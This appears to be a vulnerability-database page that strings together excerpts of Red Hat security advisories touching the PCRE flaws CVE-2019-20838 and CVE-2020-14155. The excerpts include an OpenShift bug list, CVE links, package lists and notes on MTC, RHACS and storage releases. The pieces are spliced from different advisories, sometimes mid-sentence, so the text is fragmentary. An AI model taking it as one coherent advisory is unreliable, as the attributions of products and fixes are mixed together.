periodic-ci-openshift-release-master-nightly-4.11-e2e-metal-ipi-upgrade-ovn-ipv6 2094023 - Add Git Flow - Template Labels for Deployment show as DeploymentConfig 2094024 - bump oauth-apiserver deps to include 1.23.1 k8s that fixes etcd blips 2094039 - egressIP panics with nil pointer dereference 2094055 - Bump coreos-installer for s390x Secure Execution 2094071 - No runbook created for SouthboundStale alert 2094088 - Columns in NBDB may never be updated by OVNK 2094104 - Demo dynamic plugin image tests should be skipped when testing console-operator 2094152 - Alerts in the virtualization overview status card aren't filtered 2094196 - Add default and validating webhooks for Power VS MAPI 2094227 - Topology: Create Service Binding should not be the last option (even under delete) 2094239 - custom pool Nodes with 0 nodes are always populated in progress bar 2094303 - If og is configured with sa, operator installation will be failed. 2094335 - [Nutanix] - debug logs are enabled by default in machine-controller 2094342 - apirequests limits of Cluster CAPI Operator are too low for Azure platform 2094438 - Make AWS URL parsing more lenient for GetNodeEgressIPConfiguration 2094525 - Allow automatic upgrades for efs operator 2094532 - ovn-windows CI jobs are broken 2094675 - PTP Dual Nic | Extend Events 4.11 - when kill the phc2sys We have notification for the ptp4l physical master moved to free run 2094694 - [Nutanix] No cluster name sanity validation - cluster name with a dot (".") character 2094704 - Verbose log activated on kube-rbac-proxy in deployment prometheus-k8s 2094801 - Kuryr controller keep restarting when handling IPs with leading zeros 2094806 - Machine API oVrit component should use K8s 1.24 dependencies 2094816 - Kuryr controller restarts when over quota 2094833 - Repository overview page does not show default PipelineRun template for developer user 2094857 - CloudShellTerminal loops indefinitely if DevWorkspace CR goes into failed state 2094864 - Rebase CAPG to latest changes 2094866 - oc-mirror does not always delete all manifests associated with an image during pruning 2094896 - Run 'openshift-install agent create image' has segfault exception if cluster-manifests directory missing 2094902 - Fix installer cross-compiling 2094932 - MGMT-10403 Ingress should enable single-node cluster expansion on upgraded clusters 2095049 - managed-csi StorageClass does not create PVs 2095071 - Backend tests fails after devfile registry update 2095083 - Observe > Dashboards: Graphs may change a lot on automatic refresh 2095110 - [ovn] northd container termination script must use bash 2095113 - [ovnkube] bump to openvswitch2.17-2.17.0-22.el8fdp 2095226 - Added changes to verify cloud connection and dhcpservices quota of a powervs instance 2095229 - ingress-operator pod in CrashLoopBackOff in 4.11 after upgrade starting in 4.6 due to go panic 2095231 - Kafka Sink sidebar in topology is empty 2095247 - Event sink form doesn't show channel as sink until app is refreshed 2095248 - [vSphere-CSI-Driver] does not report volume count limits correctly caused pod with multi volumes maybe schedule to not satisfied volume count node 2095256 - Samples Owner needs to be Updated 2095264 - ovs-configuration.service fails with Error: Failed to modify connection 'ovs-if-br-ex': failed to update connection: error writing to file '/etc/NetworkManager/systemConnectionsMerged/ovs-if-br-ex.nmconnection' 2095362 - oVirt CSI driver operator should use latest go-ovirt-client 2095574 - e2e-agnostic CI job fails 2095687 - Debug Container shown for build logs and on click ui breaks 2095703 - machinedeletionhooks doesn't work in vsphere cluster and BM cluster 2095716 - New PSA component for Pod Security Standards enforcement is refusing openshift-operators ns 2095756 - CNO panics with concurrent map read/write 2095772 - Memory requests for ovnkube-master containers are over-sized 2095917 - Nutanix set osDisk with diskSizeGB rather than diskSizeMiB 2095941 - DNS Traffic not kept local to zone or node when Calico SDN utilized 2096053 - Builder Image icons in Git Import flow are hard to see in Dark mode 2096226 - crio fails to bind to tentative IP, causing service failure since RHOCS was rebased on RHEL 8.6 2096315 - NodeClockNotSynchronising alert's severity should be critical 2096350 - Web console doesn't display webhook errors for upgrades 2096352 - Collect whole journal in gather 2096380 - acm-simple-kmod references deprecated KVC example 2096392 - Topology node icons are not properly visible in Dark mode 2096394 - Add page Card items background color does not match with column background color in Dark mode 2096413 - br-ex not created due to default bond interface having a different mac address than expected 2096496 - FIPS issue on OCP SNO with RT Kernel via performance profile 2096605 - [vsphere] no validation checking for diskType 2096691 - [Alibaba 4.11] Specifying ResourceGroup id in install-config.yaml, New pv are still getting created to default ResourceGroups 2096855 -oc adm release newfailed with error when use an existing multi-arch release image as input 2096905 - Openshift installer should not use the prism client embedded in nutanix terraform provider 2096908 - Dark theme issue in pipeline builder, Helm rollback form, and Git import 2097000 - KafkaConnections disappear from Topology after creating KafkaSink in Topology 2097043 - No clean way to specify operand issues to KEDA OLM operator 2097047 - MetalLB: matchExpressions used in CR like L2Advertisement, BGPAdvertisement, BGPPeers allow duplicate entries 2097067 - ClusterVersion history pruner does not always retain initial completed update entry 2097153 - poor performance on API call to vCenter ListTags with thousands of tags 2097186 - PSa autolabeling in 4.11 env upgraded from 4.10 does not work due to missing RBAC objects 2097239 - Change Lower CPU limits for Power VS cloud 2097246 - Kuryr: verify and unit jobs failing due to upstream OpenStack dropping py36 support 2097260 - openshift-install create manifests failed for Power VS platform 2097276 - MetalLB CI deploys the operator via manifests and not using the csv 2097282 - chore: update external-provisioner to the latest upstream release 2097283 - chore: update external-snapshotter to the latest upstream release 2097284 - chore: update external-attacher to the latest upstream release 2097286 - chore: update node-driver-registrar to the latest upstream release 2097334 - oc plugin help shows 'kubectl' 2097346 - Monitoring must-gather doesn't seem to be working anymore in 4.11 2097400 - Shared Resource CSI Driver needs additional permissions for validation webhook 2097454 - Placeholder bug for OCP 4.11.0 metadata release 2097503 - chore: rebase against latest external-resizer 2097555 - IngressControllersNotUpgradeable: load balancer service has been modified; changes must be reverted before upgrading 2097607 - Add Power VS support to Webhooks tests in actuator e2e test 2097685 - Ironic-agent can't restart because of existing container 2097716 - settings under httpConfig is dropped with AlertmanagerConfig v1beta1 2097810 - Required Network tools missing for Testing e2e PTP 2097832 - clean up unused IPv6DualStackNoUpgrade feature gate 2097940 - openshift-install destroy cluster traps if vpcRegion not specified 2097954 - 4.11 installation failed at monitoring and network clusteroperators with error "conmon: option parsing failed: Unknown option --log-global-size-max" making all jobs failing 2098172 - oc-mirror does not validatethe registry in the storage config 2098175 - invalid license in python-dataclasses-0.8-2.el8 spec 2098177 - python-pint-0.10.1-2.el8 has unused Patch0 in spec file 2098242 - typo in SRO specialresourcemodule 2098243 - Add error check to Platform create for Power VS 2098392 - [OCP 4.11] Ironic cannot match "wwn" rootDeviceHint for a multipath device 2098508 - Control-plane-machine-set-operator report panic 2098610 - No need to check the push permission with ?manifests-only option 2099293 - oVirt cluster API provider should use latest go-ovirt-client 2099330 - Edit application grouping is shown to user with view only access in a cluster 2099340 - CAPI e2e tests for AWS are missing 2099357 - ovn-kubernetes needs explicit RBAC coordination leases for 1.24 bump 2099358 - Dark mode+Topology update: Unexpected selected+hover border and background colors for app groups 2099528 - Layout issue: No spacing in delete modals 2099561 - Prometheus returns HTTP 500 error on /favicon.ico 2099582 - Format and update Repository overview content 2099611 - Failures on etcd-operator watch channels 2099637 - Should print error when use --keep-manifest-list\xfalse for manifestlist image 2099654 - Topology performance: Endless rerender loop when showing a Http EventSink (KameletBinding) 2099668 - KubeControllerManager should degrade when GC stops working 2099695 - Update CAPG after rebase 2099751 - specialresourcemodule stacktrace while looping over build status 2099755 - EgressIP node's mgmtIP reachability configuration option 2099763 - Update icons for event sources and sinks in topology, Add page, and context menu 2099811 - UDP Packet loss in OpenShift using IPv6 [upcall] 2099821 - exporting a pointer for the loop variable 2099875 - The speaker won't start if there's another component on the host listening on 8080 2099899 - oc-mirror looks for layers in the wrong repository when searching for release images during publishing 2099928 - [FJ OCP4.11 Bug]: Add unit tests to image_customization_test file 2099968 - [Azure-File-CSI] failed to provisioning volume in ARO cluster 2100001 - Sync upstream v1.22.0 downstream 2100007 - Run bundle-upgrade failed from the traditional File-Based Catalog installed operator 2100033 - OCP 4.11 IPI - Some csr remain "Pending" post deployment 2100038 - failure to update special-resource-lifecycle table during update Event 2100079 - SDN needs explicit RBAC coordination leases for 1.24 bump 2100138 - release info --bugs has no differentiator between Jira and Bugzilla 2100155 - kube-apiserver-operator should raise an alert when there is a Pod Security admission violation 2100159 - Dark theme: Build icon for pending status is not inverted in topology sidebar 2100323 - Sqlit-based catsrc cannot be ready due to "Error: open ./db-xxxx: permission denied" 2100347 - KASO retains old config values when switching from Medium/Default to empty worker latency profile 2100356 - Remove Condition tab and create option from console as it is deprecated in OSP-1.8 2100439 - [gce-pd] GCE PD in-tree storage plugin tests not running 2100496 - [OCPonRHV]-oVirt API returns affinity groups without a description field 2100507 - Remove redundant log lines from obj_retry.go 2100536 - Update API to allow EgressIP node reachability check 2100601 - Update CNO to allow EgressIP node reachability check 2100643 - [Migration] [GCP]OVN can not rollback to SDN 2100644 - openshift-ansible FTBFS on RHEL8 2100669 - Telemetry should not log the full path if it contains a username 2100749 - [OCP 4.11] multipath support needs multipath modules 2100825 - Update machine-api-powervs go modules to latest version 2100841 - tiny openshift-install usability fix for setting KUBECONFIG 2101460 - An etcd member for a new machine was never added to the cluster 2101498 - Revert Bug 2082599: add upper bound to number of failed attempts 2102086 - The base image is still 4.10 for operator-sdk 1.22 2102302 - Dummy bug for 4.10 backports 2102362 - Valid regions should be allowed in GCP install config 2102500 - Kubernetes NMState pods can not evict due to PDB on an SNO cluster 2102639 - Drain happens before other image-registry pod is ready to service requests, causing disruption 2102782 - topolvm-controller get into CrashLoopBackOff few minutes after install 2102834 - [cloud-credential-operator]container has runAsNonRoot and image will run as root 2102947 - [VPA] recommender is logging errors for pods with init containers 2103053 - [4.11] Backport Prow CI improvements from master 2103075 - Listing secrets in all namespaces with a specific labelSelector does not work properly 2103080 - br-ex not created due to default bond interface having a different mac address than expected 2103177 - disabling ipv6 router advertisements using "all" does not disable it on secondary interfaces 2103728 - Carry HAProxy patch 'BUG/MEDIUM: h2: match absolute-path not path-absolute for :path' 2103749 - MachineConfigPool is not getting updated 2104282 - heterogeneous arch: oc adm extract encodes arch specific release payload pullspec rather than the manifestlisted pullspec 2104432 - [dpu-network-operator] Updating images to be consistent with ART 2104552 - kube-controller-manager operator 4.11.0-rc.0 degraded on disabled monitoring stack 2104561 - 4.10 to 4.11 update: Degraded node: unexpected on-disk state: mode mismatch for file: "/etc/crio/crio.conf.d/01-ctrcfg-pidsLimit"; expected: -rw-r--r--/420/0644; received: ----------/0/0 2104589 - must-gather namespace should have ?privileged? warn and audit pod security labels besides enforce 2104701 - In CI 4.10 HAProxy must-gather takes longer than 10 minutes 2104717 - NetworkPolicies: ovnkube-master pods crashing due to panic: "invalid memory address or nil pointer dereference" 2104727 - Bootstrap node should honor http proxy 2104906 - Uninstall fails with Observed a panic: runtime.boundsError 2104951 - Web console doesn't display webhook errors for upgrades 2104991 - Completed pods may not be correctly cleaned up 2105101 - NodeIP is used instead of EgressIP if egressPod is recreated within 60 seconds 2105106 - co/node-tuning: Waiting for 15/72 Profiles to be applied 2105146 - Degraded=True noise with: UpgradeBackupControllerDegraded: unable to retrieve cluster version, no completed update was found in cluster version status history 2105167 - BuildConfig throws error when using a label with a / in it 2105334 - vmware-vsphere-csi-driver-controller can't use host port error on e2e-vsphere-serial 2105382 - Add a validation webhook for Nutanix machine provider spec in Machine API Operator 2105468 - The ccoctl does not seem to know how to leverage the VMs service account to talk to GCP APIs. 2105937 - telemeter golangci-lint outdated blocking ART PRs that update to Go1.18 2106051 - Unable to deploy acm-ice using latest SRO 4.11 build 2106058 - vSphere defaults to SecureBoot on; breaks installation of out-of-tree drivers [4.11.0] 2106062 - [4.11] Bootimage bump tracker 2106116 - IngressController spec.tuningOptions.healthCheckInterval validation allows invalid values such as "0abc" 2106163 - Samples ImageStreams vs. registry.redhat.io: unsupported: V2 schema 1 manifest digests are no longer supported for image pulls 2106313 - bond-cni: backport bond-cni GA items to 4.11 2106543 - Typo in must-gather release-4.10 2106594 - crud/other-routes.spec.ts Cypress test failing at a high rate in CI 2106723 - [4.11] Upgrade from 4.11.0-rc0 -> 4.11.0-rc.1 failed. rpm-ostree status shows No space left on device 2106855 - [4.11.z] externalTrafficPolicy=Local is not working in local gateway mode if ovnkube-node is restarted 2107493 - ReplicaSet prometheus-operator-admission-webhook has timed out progressing 2107501 - metallb greenwave tests failure 2107690 - Driver Container builds fail with "error determining starting point for build: no FROM statement found" 2108175 - etcd backup seems to not be triggered in 4.10.18-->4.10.20 upgrade 2108617 - [oc adm release] extraction of the installer against a manifestlisted payload referenced by tag leads to a bad release image reference 2108686 - rpm-ostreed: start limit hit easily 2110505 - [Upgrade]deployment openshift-machine-api/machine-api-operator has a replica failure FailedCreate 2110715 - openshift-controller-manager(-operator) namespace should clear run-level annotations 2111055 - dummy bug for 4.10.z bz2110938
- References:
https://access.redhat.com/security/cve/CVE-2018-25009 https://access.redhat.com/security/cve/CVE-2018-25010 https://access.redhat.com/security/cve/CVE-2018-25012 https://access.redhat.com/security/cve/CVE-2018-25013 https://access.redhat.com/security/cve/CVE-2018-25014 https://access.redhat.com/security/cve/CVE-2018-25032 https://access.redhat.com/security/cve/CVE-2019-5827 https://access.redhat.com/security/cve/CVE-2019-13750 https://access.redhat.com/security/cve/CVE-2019-13751 https://access.redhat.com/security/cve/CVE-2019-17594 https://access.redhat.com/security/cve/CVE-2019-17595 https://access.redhat.com/security/cve/CVE-2019-18218 https://access.redhat.com/security/cve/CVE-2019-19603 https://access.redhat.com/security/cve/CVE-2019-20838 https://access.redhat.com/security/cve/CVE-2020-13435 https://access.redhat.com/security/cve/CVE-2020-14155 https://access.redhat.com/security/cve/CVE-2020-17541 https://access.redhat.com/security/cve/CVE-2020-19131 https://access.redhat.com/security/cve/CVE-2020-24370 https://access.redhat.com/security/cve/CVE-2020-28493 https://access.redhat.com/security/cve/CVE-2020-35492 https://access.redhat.com/security/cve/CVE-2020-36330 https://access.redhat.com/security/cve/CVE-2020-36331 https://access.redhat.com/security/cve/CVE-2020-36332 https://access.redhat.com/security/cve/CVE-2021-3481 https://access.redhat.com/security/cve/CVE-2021-3580 https://access.redhat.com/security/cve/CVE-2021-3634 https://access.redhat.com/security/cve/CVE-2021-3672 https://access.redhat.com/security/cve/CVE-2021-3695 https://access.redhat.com/security/cve/CVE-2021-3696 https://access.redhat.com/security/cve/CVE-2021-3697 https://access.redhat.com/security/cve/CVE-2021-3737 https://access.redhat.com/security/cve/CVE-2021-4115 https://access.redhat.com/security/cve/CVE-2021-4156 https://access.redhat.com/security/cve/CVE-2021-4189 https://access.redhat.com/security/cve/CVE-2021-20095 https://access.redhat.com/security/cve/CVE-2021-20231 https://access.redhat.com/security/cve/CVE-2021-20232 https://access.redhat.com/security/cve/CVE-2021-23177 https://access.redhat.com/security/cve/CVE-2021-23566 https://access.redhat.com/security/cve/CVE-2021-23648 https://access.redhat.com/security/cve/CVE-2021-25219 https://access.redhat.com/security/cve/CVE-2021-31535 https://access.redhat.com/security/cve/CVE-2021-31566 https://access.redhat.com/security/cve/CVE-2021-36084 https://access.redhat.com/security/cve/CVE-2021-36085 https://access.redhat.com/security/cve/CVE-2021-36086 https://access.redhat.com/security/cve/CVE-2021-36087 https://access.redhat.com/security/cve/CVE-2021-38185 https://access.redhat.com/security/cve/CVE-2021-38593 https://access.redhat.com/security/cve/CVE-2021-40528 https://access.redhat.com/security/cve/CVE-2021-41190 https://access.redhat.com/security/cve/CVE-2021-41617 https://access.redhat.com/security/cve/CVE-2021-42771 https://access.redhat.com/security/cve/CVE-2021-43527 https://access.redhat.com/security/cve/CVE-2021-43818 https://access.redhat.com/security/cve/CVE-2021-44225 https://access.redhat.com/security/cve/CVE-2021-44906 https://access.redhat.com/security/cve/CVE-2022-0235 https://access.redhat.com/security/cve/CVE-2022-0778 https://access.redhat.com/security/cve/CVE-2022-1012 https://access.redhat.com/security/cve/CVE-2022-1215 https://access.redhat.com/security/cve/CVE-2022-1271 https://access.redhat.com/security/cve/CVE-2022-1292 https://access.redhat.com/security/cve/CVE-2022-1586 https://access.redhat.com/security/cve/CVE-2022-1621 https://access.redhat.com/security/cve/CVE-2022-1629 https://access.redhat.com/security/cve/CVE-2022-1706 https://access.redhat.com/security/cve/CVE-2022-1729 https://access.redhat.com/security/cve/CVE-2022-2068 https://access.redhat.com/security/cve/CVE-2022-2097 https://access.redhat.com/security/cve/CVE-2022-21698 https://access.redhat.com/security/cve/CVE-2022-22576 https://access.redhat.com/security/cve/CVE-2022-23772 https://access.redhat.com/security/cve/CVE-2022-23773 https://access.redhat.com/security/cve/CVE-2022-23806 https://access.redhat.com/security/cve/CVE-2022-24407 https://access.redhat.com/security/cve/CVE-2022-24675 https://access.redhat.com/security/cve/CVE-2022-24903 https://access.redhat.com/security/cve/CVE-2022-24921 https://access.redhat.com/security/cve/CVE-2022-25313 https://access.redhat.com/security/cve/CVE-2022-25314 https://access.redhat.com/security/cve/CVE-2022-26691 https://access.redhat.com/security/cve/CVE-2022-26945 https://access.redhat.com/security/cve/CVE-2022-27191 https://access.redhat.com/security/cve/CVE-2022-27774 https://access.redhat.com/security/cve/CVE-2022-27776 https://access.redhat.com/security/cve/CVE-2022-27782 https://access.redhat.com/security/cve/CVE-2022-28327 https://access.redhat.com/security/cve/CVE-2022-28733 https://access.redhat.com/security/cve/CVE-2022-28734 https://access.redhat.com/security/cve/CVE-2022-28735 https://access.redhat.com/security/cve/CVE-2022-28736 https://access.redhat.com/security/cve/CVE-2022-28737 https://access.redhat.com/security/cve/CVE-2022-29162 https://access.redhat.com/security/cve/CVE-2022-29810 https://access.redhat.com/security/cve/CVE-2022-29824 https://access.redhat.com/security/cve/CVE-2022-30321 https://access.redhat.com/security/cve/CVE-2022-30322 https://access.redhat.com/security/cve/CVE-2022-30323 https://access.redhat.com/security/cve/CVE-2022-32250 https://access.redhat.com/security/updates/classification/#important
- Contact:
The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/
Copyright 2022 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1
iQIVAwUBYvOfk9zjgjWX9erEAQhJ/w//UlbBGKBBFBAyfEmQf9Zu0yyv6MfZW0Zl iO1qXVIl9UQUFjTY5ejerx7cP8EBWLhKaiiqRRjbjtj+w+ENGB4LLj6TEUrSM5oA YEmhnX3M+GUKF7Px61J7rZfltIOGhYBvJ+qNZL2jvqz1NciVgI4/71cZWnvDbGpa 02w3Dn0JzhTSR9znNs9LKcV/anttJ3NtOYhqMXnN8EpKdtzQkKRazc7xkOTxfxyl jRiER2Z0TzKDE6dMoVijS2Sv5j/JF0LRwetkZl6+oh8ehKh5GRV3lPg3eVkhzDEo /gp0P9GdLMHi6cS6uqcREbod//waSAa7cssgULoycFwjzbDK3L2c+wMuWQIgXJca RYuP6wvrdGwiI1mgUi/226EzcZYeTeoKxnHkp7AsN9l96pJYafj0fnK1p9NM/8g3 jBE/W4K8jdDNVd5l1Z5O0Nyxk6g4P8MKMe10/w/HDXFPSgufiCYIGX4TKqb+ESIR SuYlSMjoGsB4mv1KMDEUJX6d8T05lpEwJT0RYNdZOouuObYMtcHLpRQHH9mkj86W pHdma5aGG/mTMvSMW6l6L05uT41Azm6fVimTv+E5WvViBni2480CVH+9RexKKSyL XcJX1gaLdo+72I/gZrtT+XE5tcJ3Sf5fmfsenQeY4KFum/cwzbM6y7RGn47xlEWB xBWKPzRxz0Q=9r0B -----END PGP SIGNATURE----- -- RHSA-announce mailing list RHSA-announce@redhat.com https://listman.redhat.com/mailman/listinfo/rhsa-announce . Relevant releases/architectures:
Red Hat Enterprise Linux BaseOS (v. 8) - aarch64, ppc64le, s390x, x86_64 Red Hat Enterprise Linux CRB (v. 8) - aarch64, ppc64le, s390x, x86_64
- Description:
PCRE is a Perl-compatible regular expression library.
Security Fix(es):
-
pcre: Buffer over-read in JIT when UTF is disabled and \X or \R has fixed quantifier greater than 1 (CVE-2019-20838)
-
pcre: Integer overflow when parsing callout numeric arguments (CVE-2020-14155)
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
Additional Changes:
For detailed information on changes in this release, see the Red Hat Enterprise Linux 8.5 Release Notes linked from the References section. Solution:
For details on how to apply this update, which includes the changes described in this advisory, refer to:
https://access.redhat.com/articles/11258
- Bugs fixed (https://bugzilla.redhat.com/):
1848436 - CVE-2020-14155 pcre: Integer overflow when parsing callout numeric arguments 1848444 - CVE-2019-20838 pcre: Buffer over-read in JIT when UTF is disabled and \X or \R has fixed quantifier greater than 1
- Package List:
Red Hat Enterprise Linux BaseOS (v. 8):
Source: pcre-8.42-6.el8.src.rpm
aarch64: pcre-8.42-6.el8.aarch64.rpm pcre-cpp-8.42-6.el8.aarch64.rpm pcre-cpp-debuginfo-8.42-6.el8.aarch64.rpm pcre-debuginfo-8.42-6.el8.aarch64.rpm pcre-debugsource-8.42-6.el8.aarch64.rpm pcre-devel-8.42-6.el8.aarch64.rpm pcre-tools-debuginfo-8.42-6.el8.aarch64.rpm pcre-utf16-8.42-6.el8.aarch64.rpm pcre-utf16-debuginfo-8.42-6.el8.aarch64.rpm pcre-utf32-8.42-6.el8.aarch64.rpm pcre-utf32-debuginfo-8.42-6.el8.aarch64.rpm
ppc64le: pcre-8.42-6.el8.ppc64le.rpm pcre-cpp-8.42-6.el8.ppc64le.rpm pcre-cpp-debuginfo-8.42-6.el8.ppc64le.rpm pcre-debuginfo-8.42-6.el8.ppc64le.rpm pcre-debugsource-8.42-6.el8.ppc64le.rpm pcre-devel-8.42-6.el8.ppc64le.rpm pcre-tools-debuginfo-8.42-6.el8.ppc64le.rpm pcre-utf16-8.42-6.el8.ppc64le.rpm pcre-utf16-debuginfo-8.42-6.el8.ppc64le.rpm pcre-utf32-8.42-6.el8.ppc64le.rpm pcre-utf32-debuginfo-8.42-6.el8.ppc64le.rpm
s390x: pcre-8.42-6.el8.s390x.rpm pcre-cpp-8.42-6.el8.s390x.rpm pcre-cpp-debuginfo-8.42-6.el8.s390x.rpm pcre-debuginfo-8.42-6.el8.s390x.rpm pcre-debugsource-8.42-6.el8.s390x.rpm pcre-devel-8.42-6.el8.s390x.rpm pcre-tools-debuginfo-8.42-6.el8.s390x.rpm pcre-utf16-8.42-6.el8.s390x.rpm pcre-utf16-debuginfo-8.42-6.el8.s390x.rpm pcre-utf32-8.42-6.el8.s390x.rpm pcre-utf32-debuginfo-8.42-6.el8.s390x.rpm
x86_64: pcre-8.42-6.el8.i686.rpm pcre-8.42-6.el8.x86_64.rpm pcre-cpp-8.42-6.el8.i686.rpm pcre-cpp-8.42-6.el8.x86_64.rpm pcre-cpp-debuginfo-8.42-6.el8.i686.rpm pcre-cpp-debuginfo-8.42-6.el8.x86_64.rpm pcre-debuginfo-8.42-6.el8.i686.rpm pcre-debuginfo-8.42-6.el8.x86_64.rpm pcre-debugsource-8.42-6.el8.i686.rpm pcre-debugsource-8.42-6.el8.x86_64.rpm pcre-devel-8.42-6.el8.i686.rpm pcre-devel-8.42-6.el8.x86_64.rpm pcre-tools-debuginfo-8.42-6.el8.i686.rpm pcre-tools-debuginfo-8.42-6.el8.x86_64.rpm pcre-utf16-8.42-6.el8.i686.rpm pcre-utf16-8.42-6.el8.x86_64.rpm pcre-utf16-debuginfo-8.42-6.el8.i686.rpm pcre-utf16-debuginfo-8.42-6.el8.x86_64.rpm pcre-utf32-8.42-6.el8.i686.rpm pcre-utf32-8.42-6.el8.x86_64.rpm pcre-utf32-debuginfo-8.42-6.el8.i686.rpm pcre-utf32-debuginfo-8.42-6.el8.x86_64.rpm
Red Hat Enterprise Linux CRB (v. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/
- Summary:
The Migration Toolkit for Containers (MTC) 1.6.3 is now available. Description:
The Migration Toolkit for Containers (MTC) enables you to migrate Kubernetes resources, persistent volume data, and internal container images between OpenShift Container Platform clusters, using the MTC web console or the Kubernetes API. Bugs fixed (https://bugzilla.redhat.com/):
2019088 - "MigrationController" CR displays syntax error when unquiescing applications 2021666 - Route name longer than 63 characters causes direct volume migration to fail 2021668 - "MigrationController" CR ignores the "cluster_subdomain" value for direct volume migration routes 2022017 - CVE-2021-3948 mig-controller: incorrect namespaces handling may lead to not authorized usage of Migration Toolkit for Containers (MTC) 2024966 - Manifests not used by Operator Lifecycle Manager must be removed from the MTC 1.6 Operator image 2027196 - "migration-controller" pod goes into "CrashLoopBackoff" state if an invalid registry route is entered on the "Clusters" page of the web console 2027382 - "Copy oc describe/oc logs" window does not close automatically after timeout 2028841 - "rsync-client" container fails during direct volume migration with "Address family not supported by protocol" error 2031793 - "migration-controller" pod goes into "CrashLoopBackOff" state if "MigPlan" CR contains an invalid "includedResources" resource 2039852 - "migration-controller" pod goes into "CrashLoopBackOff" state if "MigPlan" CR contains an invalid "destMigClusterRef" or "srcMigClusterRef"
- Bugs fixed (https://bugzilla.redhat.com/):
1983596 - CVE-2021-34558 golang: crypto/tls: certificate of wrong type is causing TLS client to panic 1992006 - CVE-2021-29923 golang: net: incorrect parsing of extraneous zero characters at the beginning of an IP address octet 1997017 - unprivileged client fails to get guest agent data 1998855 - Node drain: Sometimes source virt-launcher pod status is Failed and not Completed 2000251 - RoleBinding and ClusterRoleBinding brought in by kubevirt does not get reconciled when kind is ServiceAccount 2001270 - [VMIO] [Warm from Vmware] Snapshot files are not deleted after Successful Import 2001281 - [VMIO] [Warm from VMware] Source VM should not be turned ON if vmio import is removed 2001901 - [4.8.3] NNCP creation failures after nmstate-handler pod deletion 2007336 - 4.8.3 containers 2007776 - Failed to Migrate Windows VM with CDROM (readonly) 2008511 - [CNV-4.8.3] VMI is in LiveMigrate loop when Upgrading Cluster from 2.6.7/4.7.32 to OCP 4.8.13 2012890 - With descheduler during multiple VMIs migrations, some VMs are restarted 2025475 - [4.8.3] Upgrade from 2.6 to 4.x versions failed due to vlan-filtering issues 2026881 - [4.8.3] vlan-filtering is getting applied on veth ports
- Description:
The release of RHACS 3.67 provides the following new features, bug fixes, security patches and system changes:
OpenShift Dedicated support
RHACS 3.67 is thoroughly tested and supported on OpenShift Dedicated on Amazon Web Services and Google Cloud Platform. Use OpenShift OAuth server as an identity provider If you are using RHACS with OpenShift, you can now configure the built-in OpenShift OAuth server as an identity provider for RHACS. Enhancements for CI outputs Red Hat has improved the usability of RHACS CI integrations. CI outputs now show additional detailed information about the vulnerabilities and the security policies responsible for broken builds. Runtime Class policy criteria Users can now use RHACS to define the container runtime configuration that may be used to run a pod’s containers using the Runtime Class policy criteria.
Bug Fixes The release of RHACS 3.67 includes the following bug fixes:
- Previously, when using RHACS with the Compliance Operator integration, RHACS did not respect or populate Compliance Operator TailoredProfiles. This has been fixed. Previously, the Alpine Linux package manager (APK) in Image policy looked for the presence of apk package in the image rather than the apk-tools package. This issue has been fixed.
System changes The release of RHACS 3.67 includes the following system changes:
- Scanner now identifies vulnerabilities in Ubuntu 21.10 images. The Port exposure method policy criteria now include route as an exposure method. The OpenShift: Kubeadmin Secret Accessed security policy now allows the OpenShift Compliance Operator to check for the existence of the Kubeadmin secret without creating a violation. The OpenShift Compliance Operator integration now supports using TailoredProfiles. The RHACS Jenkins plugin now provides additional security information. When you enable the environment variable ROX_NETWORK_ACCESS_LOG for Central, the logs contain the Request URI and X-Forwarded-For header values. The default uid:gid pair for the Scanner image is now 65534:65534. RHACS adds a new default Scope Manager role that includes minimum permissions to create and modify access scopes. In addition to manually uploading vulnerability definitions in offline mode, you can now upload definitions in online mode. You can now format the output of the following roxctl CLI commands in table, csv, or JSON format: image scan, image check & deployment check
-
You can now use a regular expression for the deployment name while specifying policy exclusions
-
Solution:
To take advantage of these new features, fixes and changes, please upgrade Red Hat Advanced Cluster Security for Kubernetes to version 3.67. Bugs fixed (https://bugzilla.redhat.com/):
1956818 - CVE-2021-23343 nodejs-path-parse: ReDoS via splitDeviceRe, splitTailRe and splitPathRe 1978144 - CVE-2021-32690 helm: information disclosure vulnerability 1992006 - CVE-2021-29923 golang: net: incorrect parsing of extraneous zero characters at the beginning of an IP address octet 1999784 - CVE-2021-3749 nodejs-axios: Regular expression denial of service in trim function 2005445 - CVE-2021-3801 nodejs-prismjs: ReDoS vulnerability 2006044 - CVE-2021-39293 golang: archive/zip: malformed archive may cause panic or memory exhaustion (incomplete fix of CVE-2021-33196) 2016640 - CVE-2020-27304 civetweb: directory traversal when using the built-in example HTTP form-based file upload mechanism via the mg_handle_form_request API
- JIRA issues fixed (https://issues.jboss.org/):
RHACS-65 - Release RHACS 3.67.0
- In addition to persistent storage, Red Hat OpenShift Container Storage provides a multicloud data management service with an S3 compatible API.
Bug Fix(es):
-
Previously, when the namespace store target was deleted, no alert was sent to the namespace bucket because of an issue in calculating the namespace bucket health. With this update, the issue in calculating the namespace bucket health is fixed and alerts are triggered as expected. (BZ#1993873)
-
Previously, the Multicloud Object Gateway (MCG) components performed slowly and there was a lot of pressure on the MCG components due to non-optimized database queries. With this update the non-optimized database queries are fixed which reduces the compute resources and time taken for queries. Bugs fixed (https://bugzilla.redhat.com/):
1993873 - [4.8.z clone] Alert NooBaaNamespaceBucketErrorState is not triggered when namespacestore's target bucket is deleted 2006958 - CVE-2020-26301 nodejs-ssh2: Command injection by calling vulnerable method with untrusted input
- Description:
This release adds the new Apache HTTP Server 2.4.37 Service Pack 10 packages that are part of the JBoss Core Services offering. Solution:
Before applying this update, make sure all previously released errata relevant to your system have been applied
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
